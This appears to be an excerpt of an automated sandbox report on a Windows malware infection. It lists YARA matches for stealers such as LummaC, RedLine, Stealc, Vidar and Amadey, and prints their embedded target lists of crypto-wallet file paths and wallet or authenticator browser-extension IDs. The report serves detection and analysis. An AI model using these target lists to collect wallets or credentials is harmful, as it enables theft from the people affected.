Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 7.2.skotes.exe.780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HYCURX00F7L1ZQ3FYN.exe.cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2794527881.0000000000091000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1940237462.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1985380947.0000000000781000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1981707375.0000000000781000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1953240944.0000000000CC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2199394159.0000000004880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000003.2747338308.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1912936002.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: f8fdf848d8.exe PID: 8100, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: 5f198671b1.exe PID: 7960, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: random.exe PID: 7320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1cfdc82c16.exe PID: 2316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0436fcd702.exe PID: 7808, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected RedLine Stealer

Source: Yara match	File source: 0000000E.00000003.2445420622.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 275588fe9c.exe PID: 7880, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000002.00000003.1887563920.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2599584604.0000000000E51000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.2747944923.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2597406070.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2552141313.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2178019911.0000000000F51000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AGDDD2MYZL6KQO94XW.exe PID: 7648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 48b7eec64e.exe PID: 4960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 48b7eec64e.exe PID: 8016, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: AGDDD2MYZL6KQO94XW.exe PID: 7648, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: random.exe, 00000000.00000003.1771608708.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: random.exe, 00000000.00000003.1785770096.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: chhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage*
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystore
